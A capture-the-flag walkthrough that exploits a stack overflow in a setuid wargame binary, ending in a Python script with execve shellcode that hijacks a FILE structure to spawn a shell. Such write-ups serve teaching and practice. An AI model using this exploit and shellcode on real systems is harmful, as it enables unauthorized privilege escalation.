As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Hello again. Make sure you are comfortable, because this is going to be a somewhat long level, and rather more difficult than what we have seen so far.

First order of business, login & ls:

$ ssh -p 2225 level5@blackbox.smashthestack.org
level5@blackbox.smashthestack.org's password:
...
level5@blackbox:~$ ls -l
total 560
-rwsr-xr-x 1 level6 level6 557846 2008-01-12 21:17 list
-rw-r--r-- 1 root   level5    475 2007-12-29 14:10 list.c
-rw-r--r-- 1 root   level5     10 2007-12-29 14:10 password


And now we take a look at the source file:

#include <stdio.h>

int main(int argc, char **argv)
{
    char buf[100];
    size_t len;
    char fixedbuf[10240];
    FILE *fh;
    char *ptr = fixedbuf;
    int i;

    fh = fopen("somefile", "r");
    if(!fh)
        return 0;

    while((len = fread(buf, 1, 100, fh)) > 0) {
        for(i = 0; i < len; i++) {
            // Disable output modifiers
            switch(buf[i]) {
                case 0xFF:
                case 0x00:
                case 0x01:
                    break;
                default:
                    *ptr = buf[i];
                    ptr++;
            }
        }
    }
    printf("%s", fixedbuf);

    fclose(fh);
}


The program seems to open some fixed file from the current path (which means that we will have to generate that "somefile" file under /tmp), it then proceeds to read chunks of 100 bytes from the file into some temporary buffer, which are copied to a bigger buffer while filtering-out specific byte values.

The contents of the big buffer are then printed out to us.
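
To make the filtering concrete, here is a small Python model of the read-chunk-and-copy loop. It is only a sketch of the logic in list.c, not the program itself: the name filter_copy is made up for illustration, and unlike the C code it has no fixed-size destination, so nothing can overflow.

```python
FILTERED = {0x00, 0x01, 0xFF}  # byte values the switch statement drops
CHUNK = 100                    # fread(buf, 1, 100, fh)


def filter_copy(data: bytes) -> bytes:
    """Model of the loop in list.c: copy data chunk by chunk, skipping filtered bytes."""
    out = bytearray()
    for start in range(0, len(data), CHUNK):
        chunk = data[start:start + CHUNK]   # one fread() worth of input
        for byte in chunk:
            if byte in FILTERED:
                continue                    # the "break" in the switch: nothing is copied
            out.append(byte)                # *ptr = buf[i]; ptr++
    return bytes(out)


if __name__ == "__main__":
    # The three filtered byte values disappear from the output.
    print(filter_copy(b"A\x00B\x01C\xffD"))
```

The important consequence for us is that every byte we want to land in memory must avoid those three values.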

Well, our attack surface is obviously the file somefile. We can also notice that if somefile is longer than 10240 bytes, the read-chunk-and-copy loop will happily continue its business, whereby it will probably mess up the stack.

So let’s try to see what the stack frame looks like. The way to do that is to look at the disassembly of main:

level5@blackbox:~$ objdump -d list|grep -A65 "<main>:"
08048208 <main>:
8048208: 8d 4c 24 04           lea    0x4(%esp),%ecx
804820c: 83 e4 f0              and    $0xfffffff0,%esp
804820f: ff 71 fc              pushl  0xfffffffc(%ecx)
8048212: 55                    push   %ebp
8048213: 89 e5                 mov    %esp,%ebp
8048215: 51                    push   %ecx
8048216: 81 ec 94 28 00 00     sub    $0x2894,%esp
804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)
8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)
804823c: 83 7d f0 00           cmpl   $0x0,0xfffffff0(%ebp)
8048240: 75 43                 jne    8048285 <main+0x7d>
8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
8048249: 00 00 00
804824c: e9 8f 00 00 00        jmp    80482e0 <main+0xd8>
8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)
8048258: eb 23                 jmp    804827d <main+0x75>
804825a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
804825d: 0f b6 44 05 88        movzbl 0xffffff88(%ebp,%eax,1),%eax
8048262: fe c0                 inc    %al
8048264: 3c 02                 cmp    $0x2,%al
8048266: 77 02                 ja     804826a <main+0x62>
8048268: eb 10                 jmp    804827a <main+0x72>
804826a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
804826d: 0f b6 54 05 88        movzbl 0xffffff88(%ebp,%eax,1),%edx
8048272: 8b 45 f4              mov    0xfffffff4(%ebp),%eax
8048275: 88 10                 mov    %dl,(%eax)
8048277: ff 45 f4              incl   0xfffffff4(%ebp)
804827a: ff 45 f8              incl   0xfffffff8(%ebp)
804827d: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
8048280: 3b 45 ec              cmp    0xffffffec(%ebp),%eax
8048283: 72 d5                 jb     804825a <main+0x52>
8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
804829b: 00
804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
804829f: 89 04 24              mov    %eax,(%esp)
80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)
80482aa: 83 7d ec 00           cmpl   $0x0,0xffffffec(%ebp)
80482ae: 0f 95 c0              setne  %al
80482b1: 84 c0                 test   %al,%al
80482b3: 75 9c                 jne    8048251 <main+0x49>
80482b5: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
80482bb: 89 44 24 04           mov    %eax,0x4(%esp)
80482bf: c7 04 24 93 32 0a 08  movl   $0x80a3293,(%esp)
80482c6: e8 e5 ab 00 00        call   8052eb0 <_IO_printf>
80482cb: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
80482ce: 89 04 24              mov    %eax,(%esp)
80482d1: e8 0a ac 00 00        call   8052ee0 <_IO_new_fclose>
80482d6: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
80482dd: 00 00 00
80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
80482ec: 59                    pop    %ecx
80482ed: 5d                    pop    %ebp
80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
80482f1: c3                    ret

Wow, good thing the executable has symbol information, because the way to identify the position of the local variables on the stack is by tracking library function calls. Let’s start with these two lines though:

804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)

This looks like an address assignment, and we have such a line in the C program:

char *ptr = fixedbuf;

This means that fixedbuf starts at ebp-0x2878, and ptr is stored at ebp-0xc.

Next we have a call to _IO_new_fopen:

8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)

And the output, which is a file pointer, is stored at ebp-0x10, which must be our fp (the source calls it fh).

Now let’s look at the call to _IO_fread:

8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
804829b: 00
804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
804829f: 89 04 24              mov    %eax,(%esp)
80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)

The first parameter is at the bottom of the stack (at esp); this should be the address of buf, and we can see it is ebp-0x78. The rest of the parameters are already known to us, so I won’t dwell on them. What’s left in this function call is the return value, which is stored at ebp-0x14 and is our len.

The last local variable is i. We can recognize it as the address that gets loaded with a 0, as we can see in the for-loop initialization. There are actually two such instances. This is the first one:

8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)


Which is the return value of main, as we can see eax is reloaded from that address right before exiting main:

80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
80482ec: 59                    pop    %ecx
80482ed: 5d                    pop    %ebp
80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
80482f1: c3                    ret

The second one is the one that interests us:

8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)


Which means i is stored at ebp-0x8.

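Let’s summarize it all in one diagram (higher addresses at the top):

ebp           saved ebp
ebp-0x4       saved ecx
ebp-0x8       i
ebp-0xc       ptr
ebp-0x10      fp
ebp-0x14      len
ebp-0x78      buf (100 bytes, ends right below len)
ebp-0x2878    fixedbuf (10240 bytes, ends right below buf)
ebp-0x2888    return value of main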
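
The offsets recovered from the disassembly can be double-checked with a few lines of Python. This is just a sanity-check sketch: the helper names (to_signed, end_of) are mine, and the sizes come from the declarations in list.c, assuming 4-byte size_t, pointers and int on this 32-bit target.

```python
# Offsets relative to ebp, as read from the disassembly of main.
OFFSETS = {
    "fixedbuf": -0x2878,
    "buf": -0x78,
    "len": -0x14,
    "fp": -0x10,
    "ptr": -0x0C,
    "i": -0x08,
}
# Sizes from the C declarations (4-byte size_t, pointers and int assumed).
SIZES = {"fixedbuf": 10240, "buf": 100, "len": 4, "fp": 4, "ptr": 4, "i": 4}


def to_signed(displacement: int) -> int:
    """Turn a 32-bit displacement as printed by objdump (e.g. 0xffffd788) into a signed offset."""
    return displacement - (1 << 32) if displacement & 0x80000000 else displacement


def end_of(name: str) -> int:
    """Offset (relative to ebp) of the first byte past the named variable."""
    return OFFSETS[name] + SIZES[name]


if __name__ == "__main__":
    for name in sorted(OFFSETS, key=OFFSETS.get, reverse=True):
        print(f"ebp{OFFSETS[name]:+#x}  {name} ({SIZES[name]} bytes)")
```

Note how each variable ends exactly where the next one begins: fixedbuf runs straight into buf, and buf runs straight into len.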

Imagine now the following scenario: we have a very big file, and the read-chunk-and-copy loop keeps copying the data from buf into fixedbuf. After 102 of these cycles, ptr points to fixedbuf+10200, that is, buf-40. After the next cycle, ptr points to buf+60. This means that during the next cycle (the 104’th, if my tally has been kept correctly) ptr will end up pointing beyond the stack frame.

Not entirely though. The thing is, that the copying is not done in one atomic operation, rather, buf is copied to ptr byte-by-byte, which means that 40 bytes into the 104’th cycle, the value of len will change. This affects the flow control of the for-loop, because if we make len smaller than i is in that round, the loop will stop.
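
The tally above is easy to verify. The sketch below assumes that none of the file bytes are filtered (so every cycle advances ptr by exactly 100) and uses the sizes of fixedbuf and buf from the source; the function names are made up for illustration.

```python
FIXEDBUF_SIZE = 10240   # char fixedbuf[10240]
BUF_SIZE = 100          # char buf[100]
CHUNK = 100             # bytes copied per cycle when nothing is filtered


def ptr_after(cycles: int) -> int:
    """Position of ptr relative to the start of buf after the given number of full cycles."""
    return cycles * CHUNK - FIXEDBUF_SIZE


def first_hit_on_len():
    """Return (cycle, bytes_into_cycle) at which ptr first points at len."""
    len_distance = FIXEDBUF_SIZE + BUF_SIZE      # len sits right after buf
    full_cycles, remainder = divmod(len_distance, CHUNK)
    return full_cycles + 1, remainder


if __name__ == "__main__":
    print(ptr_after(102), ptr_after(103))   # relative to buf
    print(first_hit_on_len())
```

So the first byte of len is reached 10340 bytes into the file, which is the number that matters when building the input.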

Since x86 is a little-endian machine, the first byte of len that will be overwritten is the LSB, so we must overwrite it with a value that keeps the loop going; anything larger than 101 will do.

Now, remember that not all byte values are allowed, and if we want to reach interesting places in the stack, we are forced to write the rest of len. This means that the smallest value we can write is 0x02, and this will make len look something like 0x020202?? when we are done with it.
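
Here is a small sketch of that constraint. It assumes the filter drops exactly 0x00, 0x01 and 0xFF, as in list.c; the helper names writable and smallest_len are mine.

```python
import struct

FILTERED = {0x00, 0x01, 0xFF}  # byte values that never reach memory


def writable(value: int) -> bool:
    """True if every byte of the little-endian 32-bit value passes the filter."""
    return not any(b in FILTERED for b in struct.pack("<L", value))


def smallest_len(lsb: int) -> int:
    """Smallest 32-bit value with the given low byte whose upper three bytes pass the filter."""
    smallest_byte = min(b for b in range(256) if b not in FILTERED)
    return (smallest_byte << 24) | (smallest_byte << 16) | (smallest_byte << 8) | lsb


if __name__ == "__main__":
    print(hex(smallest_len(0x70)))
    print(writable(0x02020270), writable(0x00000070))
```

The low byte 0x70 is only an example of a value that keeps the loop alive; any other unfiltered byte that is large enough would serve.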

Next we overwrite fp; again, we cannot avoid overwriting it. Let’s leave the discussion about it for later though.

After that comes ptr, and this is where it gets tricky: we are overwriting the pointer, using itself as a pointer to its individual bytes. Whichever way it goes, once we overwrite the LSB, the pointer will not point to itself anymore, so we need to decide where we want it to point. Well, how about skipping over the rest of ptr and continuing at the MSB of i?

Why would we want to do that? Well, remember we put something like 0x020202?? in len? If we set the MSB of i to 0x03, then i will look like 0x03??????, which is bigger than len! So after that the loop will stop.

Why do we want it to stop now? Well, you see, when the loop on i stops, there will be another call to fread, only now, fp is different.
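
To convince ourselves that the byte-by-byte overwrite really behaves this way, here is a rough Python replay of the loop on a byte array standing in for the stack frame. Everything concrete in it is an assumption made for illustration: the value of EBP, the stand-in ORIGINAL_FP, and the marker NEW_FP that we want to end up in fp. It models only the loop in main, not fread itself.

```python
import struct

EBP = 0xBFFED8F8          # assumed value of ebp, for illustration only
OFF = {"fixedbuf": -0x2878, "buf": -0x78, "len": -0x14, "fp": -0x10, "ptr": -0x0C, "i": -0x08}
BASE = EBP + OFF["fixedbuf"]   # lowest address we model
FILTERED = {0x00, 0x01, 0xFF}
ORIGINAL_FP = 0x080A5000  # made-up stand-in for the FILE * returned by fopen
NEW_FP = 0x41424344       # arbitrary marker we want fp to end up holding


def addr(name):
    return EBP + OFF[name]


class Frame:
    """The part of main's stack frame between fixedbuf and ebp, as a flat byte array."""

    def __init__(self):
        self.mem = bytearray(EBP - BASE)

    def read32(self, address):
        return struct.unpack_from("<L", self.mem, address - BASE)[0]

    def write32(self, address, value):
        struct.pack_into("<L", self.mem, address - BASE, value & 0xFFFFFFFF)


def run_loop(data):
    """Replay the read-chunk-and-copy loop until fread would be called with a clobbered fp."""
    f = Frame()
    f.write32(addr("fp"), ORIGINAL_FP)
    f.write32(addr("ptr"), addr("fixedbuf"))
    pos = 0
    while f.read32(addr("fp")) == ORIGINAL_FP:
        chunk = data[pos:pos + 100]
        pos += len(chunk)
        if not chunk:
            break
        start = addr("buf") - BASE
        f.mem[start:start + len(chunk)] = chunk            # fread fills buf
        f.write32(addr("len"), len(chunk))
        f.write32(addr("i"), 0)
        while f.read32(addr("i")) < f.read32(addr("len")):
            byte = f.mem[addr("buf") - BASE + f.read32(addr("i"))]
            if byte not in FILTERED:
                f.mem[f.read32(addr("ptr")) - BASE] = byte          # *ptr = buf[i]
                # ptr++ on the value now in memory: the store above may have changed ptr itself
                f.write32(addr("ptr"), f.read32(addr("ptr")) + 1)
            f.write32(addr("i"), f.read32(addr("i")) + 1)
    return f


def build_demo_input():
    filler = b"\x90" * (10240 + 100)            # reaches the first byte of len
    tail = struct.pack("<L", 0x02020270)        # new len
    tail += struct.pack("<L", NEW_FP)           # new fp
    tail += bytes([(addr("i") + 2) & 0xFF])     # new LSB of ptr
    tail += b"\x03"                             # lands on the MSB of i
    return filler + tail


if __name__ == "__main__":
    frame = run_loop(build_demo_input())
    for name in ("len", "fp", "ptr", "i"):
        print(f"{name:4} = {frame.read32(addr(name)):#010x}")
```

The replay ends with fp holding our marker and i larger than len, which is exactly the state we want when fread is called again.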

What would happen? Well, let’s take a look at that _IO_fread (cropped in favor of readability):

080532b0 <_IO_fread>:
80532b0: 55                    push   %ebp
80532b1: 89 e5                 mov    %esp,%ebp
80532b3: 83 ec 2c              sub    $0x2c,%esp
80532b6: 89 75 f8              mov    %esi,0xfffffff8(%ebp)
80532b9: 8b 75 0c              mov    0xc(%ebp),%esi
80532bc: 89 7d fc              mov    %edi,0xfffffffc(%ebp)
80532bf: 8b 7d 10              mov    0x10(%ebp),%edi
80532c2: 89 5d f4              mov    %ebx,0xfffffff4(%ebp)
80532c5: 0f af f7              imul   %edi,%esi
80532c8: 85 f6                 test   %esi,%esi
80532ca: 0f 84 a4 00 00 00     je     8053374 <_IO_fread+0xc4>
80532d0: 8b 55 14              mov    0x14(%ebp),%edx
80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
80532da: 8b 02                 mov    (%edx),%eax
80532dc: 25 00 80 00 00        and    $0x8000,%eax
80532e1: 66 85 c0              test   %ax,%ax
80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>
80532e6: b8 00 00 00 00        mov    $0x0,%eax
80532eb: 85 c0                 test   %eax,%eax
80532ed: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
80532f4: 0f 85 7e 00 00 00     jne    8053378 <_IO_fread+0xc8>
80532fa: 8b 45 14              mov    0x14(%ebp),%eax
80532fd: 89 04 24              mov    %eax,(%esp)
8053300: e8 bb 40 02 00        call   80773c0 <_IO_flockfile>
8053305: 8b 55 14              mov    0x14(%ebp),%edx
8053308: 8b 45 08              mov    0x8(%ebp),%eax
805330b: 89 74 24 08           mov    %esi,0x8(%esp)
805330f: 89 14 24              mov    %edx,(%esp)
8053312: 89 44 24 04           mov    %eax,0x4(%esp)
8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>
805331b: 8b 55 14              mov    0x14(%ebp),%edx
805331e: 89 c3                 mov    %eax,%ebx
8053320: 8b 02                 mov    (%edx),%eax
8053322: 25 00 80 00 00        and    $0x8000,%eax
8053327: 66 85 c0              test   %ax,%ax
805332a: 74 37                 je     8053363 <_IO_fread+0xb3>
...


First, let’s recall what the parameters to _IO_fread are, in what order they sit on the stack, and where we can see them in the disassembly.

Well, the parameters were (from the bottom) buf, then the chunk length (1), then the number of chunks (100), and finally fp.

This means that inside _IO_fread, we can find fp at ebp+0x14. Let’s see what the function does with it:

80532d0: 8b 55 14              mov    0x14(%ebp),%edx
80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
80532da: 8b 02                 mov    (%edx),%eax
80532dc: 25 00 80 00 00        and    $0x8000,%eax
80532e1: 66 85 c0              test   %ax,%ax
80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>


The long-word to which fp points is copied into eax, after which it is masked with 0x8000, and if that bit is set, it jumps to 0x08053305:

 8053305: 8b 55 14              mov    0x14(%ebp),%edx
8053308: 8b 45 08              mov    0x8(%ebp),%eax
805330b: 89 74 24 08           mov    %esi,0x8(%esp)
805330f: 89 14 24              mov    %edx,(%esp)
8053312: 89 44 24 04           mov    %eax,0x4(%esp)
8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>


This is a call to _IO_sgetn with fp as the first parameter.

Fine, let’s see what _IO_sgetn does:

08056bd0 <_IO_sgetn>:
8056bd0: 55                    push   %ebp
8056bd1: 89 e5                 mov    %esp,%ebp
8056bd3: 8b 55 08              mov    0x8(%ebp),%edx
8056bd6: 5d                    pop    %ebp
8056bd7: 8b 8a 94 00 00 00     mov    0x94(%edx),%ecx
8056bdd: 8b 49 20              mov    0x20(%ecx),%ecx
8056be0: ff e1                 jmp    *%ecx
8056be2: 8d b4 26 00 00 00 00  lea    0x0(%esi),%esi
8056be9: 8d bc 27 00 00 00 00  lea    0x0(%edi),%edi


In the context of _IO_sgetn, fp is located at ebp+0x8.

Well, there’s some pointer magic happening here, after which there is a jump to a location stored in ecx.

Let’s try to write it in more readable C notation:

edx = fp;
ecx = *(unsigned long *)(edx + 0x94);
ecx = *(unsigned long *)(ecx + 0x20);


It looks like fp actually points to some structure, which contains pointers to other structures, which contain an address of a handler.
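
The same chain can be followed in Python on a toy memory image, which makes it easier to experiment with. This is only a sketch of the two steps we read from the disassembly (the flag test in _IO_fread and the double dereference in _IO_sgetn); the base address, the toy image and the function names are made up, and the locking path taken when the flag bit is clear is not modelled.

```python
import struct


def read32(mem: bytes, base: int, address: int) -> int:
    """Read a little-endian 32-bit word at a virtual address from an image that starts at base."""
    return struct.unpack_from("<L", mem, address - base)[0]


def fread_jump_target(mem: bytes, base: int, fp: int):
    """Follow fp the way _IO_fread and _IO_sgetn do; return the address that ends up in ecx."""
    flags = read32(mem, base, fp)
    if not flags & 0x8000:
        return None                            # bit clear: _IO_flockfile is called first (not modelled)
    table = read32(mem, base, fp + 0x94)       # ecx = *(edx + 0x94)
    return read32(mem, base, table + 0x20)     # ecx = *(ecx + 0x20); jmp *ecx


def toy_image():
    """Build a tiny made-up memory image containing a fake structure; returns (mem, base)."""
    base = 0x1000
    mem = bytearray(0x200)
    struct.pack_into("<L", mem, 0x000, 0x00008000)    # flags word with bit 0x8000 set
    struct.pack_into("<L", mem, 0x094, base + 0x100)  # pointer to the second structure
    struct.pack_into("<L", mem, 0x120, 0xDEADBEEF)    # handler address at second structure + 0x20
    return bytes(mem), base


if __name__ == "__main__":
    mem, base = toy_image()
    print(hex(fread_jump_target(mem, base, base)))
```

Whoever controls the memory that fp points to therefore controls where the program jumps.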

Well, if we can make the program jump to our handler, we can make it execute a shell.

OK then, let’s look back and review what we know, and decide on a strategy.

First, we have found a way to overwrite fp, and then stop the loop and make fread run again.

Then we saw that in fread, some address is extracted from fp, and then the program jumps to that address.

I propose then the following strategy:
1. We overwrite fp with the address of the bottom of fixedbuf.
2. We prepare the first long word at the bottom of fixedbuf to be something like 0x????80??, so as to steer the execution path in our direction.
3. 0x94 bytes after the beginning of fixedbuf, we prepare a pointer to another place in fixedbuf. Let’s call it ptr1.
4. 0x20 bytes after ptr1, we prepare another address, which will be the address of our shellcode.

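It should be much easier to understand this in a diagram:

fixedbuf+0x00    0x????80??              (fp points here)
fixedbuf+0x94    ptr1                    (points somewhere else in fixedbuf)
ptr1+0x20        address of the shellcode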

This is the structure we need to have in the beginning of our file.
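
As a sketch, such a structure could be assembled like this. The address of fixedbuf and the one-byte stand-in for the shellcode are placeholders for illustration, and placing ptr1 and the shellcode directly after the pointers that reference them is just one convenient choice; any unfiltered spot inside fixedbuf would do.

```python
import struct

FIXEDBUF = 0xBFFEB080   # assumed address of fixedbuf, for illustration only
SHELLCODE = b"\xcc"     # placeholder byte standing in for real shellcode


def build_prefix(fixedbuf: int, shellcode: bytes) -> bytes:
    """Lay out the fake structure that fp will point to, followed by the shellcode."""
    ptr1 = fixedbuf + 0x98                 # right after the pointer stored at +0x94
    shell_addr = ptr1 + 0x20 + 4           # right after the pointer stored at ptr1+0x20
    out = struct.pack("<L", 0x80808080)    # first long word, bit 0x8000 set
    out += b"\x90" * (0x94 - len(out))     # padding up to offset 0x94
    out += struct.pack("<L", ptr1)
    out += b"\x90" * 0x20                  # padding between ptr1 and ptr1+0x20
    out += struct.pack("<L", shell_addr)
    out += shellcode
    return out


if __name__ == "__main__":
    prefix = build_prefix(FIXEDBUF, SHELLCODE)
    ptr1 = struct.unpack_from("<L", prefix, 0x94)[0]
    target = struct.unpack_from("<L", prefix, ptr1 - FIXEDBUF + 0x20)[0]
    print(hex(ptr1), hex(target), len(prefix))
```

The padding byte 0x90 is used only because it passes the filter; its value does not matter for the pointer chain.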

Assuming we know ebp, the end of the file (meaning, starting from the point at which we overwrite len) should look like this:
1. First 0x70, just to make sure we keep the for-loop alive.
2. Then 0x020202, because we have to.
3. Then we overwrite fp with fixedbuf=ebp-0x2878.
4. Then we overwrite the LSB of ptr with the LSB of the address of the second-to-MSB byte of i. That is because after we overwrite the LSB of ptr, it gets incremented in the next line of code, which makes ptr point to the MSB of i.
5. And then we overwrite the MSB of i with 0x03, which causes the loop to stop and lets the beginning of the file do its magic.

Between the beginning and the end, we need to fill the space with something.

The only open question left is - what is ebp?

Let’s take a look:

level5@blackbox:~$ gdb list
...
(gdb) break main
Breakpoint 1 at 0x8048216
(gdb) run
Starting program: /home/level5/list
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd8f8

Well, this means that we need to overwrite fp with ebp-0x2878=0xbfffb080. This is not good, because the address 0xbfffb080 contains the byte 0xff, which we cannot write.

This pretty much closes the lid on everything we were planning so far, because the basic premise of the entire strategy is that we can redirect fp to our own file structure.

However, we should not abandon all hope, because we have the power to make the stack begin much lower by simply feeding some very long argument to the program. Let’s see how this works:

(gdb) run `python -c "print 'a'*0x100"`
Starting program: /home/level5/list `python -c "print 'a'*0x100"`
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd7f8

This address is lower by 0x100 bytes than ebp when running without parameters. Let’s try again now with an even larger number:

(gdb) run `python -c "print 'a'*0x10000"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level5/list `python -c "print 'a'*0x10000"`
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$2 = (void *) 0xbffed8f8

Bingo! That is our ebp, for reasons I’ll go into in a pending article. Suffice it to say that when running list inside gdb we have argv[0]=/home/level5/list (as shown in the "Starting program" line above), and when running ~/list from /tmp we have argv[0]=/home/level5/list, which are the same.

Well, now that we have all our constants and strategies settled, we can generate the input file. I like using scripts:

import struct

EBP = 0xbffed8f8
FIXEDBUF = EBP - 0x2878
I = EBP - 0x8
PTR1 = FIXEDBUF + 0x98
PTR2 = FIXEDBUF + 0xbc
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x80808080)   # first long word, bit 0x8000 set
FILE += '\x90' * 0x90
FILE += struct.pack("<L", PTR1)         # lands at fixedbuf+0x94
FILE += '\x90' * 0x20
FILE += struct.pack("<L", PTR2)         # lands at PTR1+0x20, points to the shellcode
FILE += SHELLCODE
FILE += '\x90' * (10340 - len(FILE))    # filler up to the first byte of len
FILE += struct.pack("<L", 0x02020270)   # new len
FILE += struct.pack("<L", FIXEDBUF)     # new fp
FILE += struct.pack("<L", I + 2)[0]     # new LSB of ptr
FILE += '\x03'                          # new MSB of i

f = open('somefile', 'wb')
f.write(FILE)
f.close()

Let’s give it a shot:

level5@blackbox:/tmp$ python genfile.py
level5@blackbox:/tmp$ ~/list `python -c "print 'a'*0x10000"`
sh-3.1$ cat /home/level6/password
???????????????
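
The address arithmetic behind the long-argument trick can be replayed in a few lines of Python. This is a sketch under one loud assumption: that every argument byte lowers ebp by exactly one byte, which is what the gdb runs above suggest but which stack alignment could change in general. The function names are mine.

```python
import struct

FILTERED = {0x00, 0x01, 0xFF}   # byte values the filter in list.c drops
FIXEDBUF_OFFSET = 0x2878        # fixedbuf = ebp - 0x2878


def bad_bytes(address: int):
    """Bytes of the little-endian address that the filter would drop."""
    return [b for b in struct.pack("<L", address) if b in FILTERED]


def fixedbuf_for(ebp_without_args: int, arg_length: int) -> int:
    """Address of fixedbuf, assuming ebp drops by one byte per argument byte."""
    return ebp_without_args - arg_length - FIXEDBUF_OFFSET


if __name__ == "__main__":
    for arg_length in (0, 0x100, 0x10000):
        address = fixedbuf_for(0xBFFFD8F8, arg_length)
        print(hex(arg_length), hex(address), [hex(b) for b in bad_bytes(address)])
```

Only the 0x10000-byte argument moves fixedbuf to an address free of filtered bytes, which is why the smaller 0x100 experiment was not enough.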


And we’re done!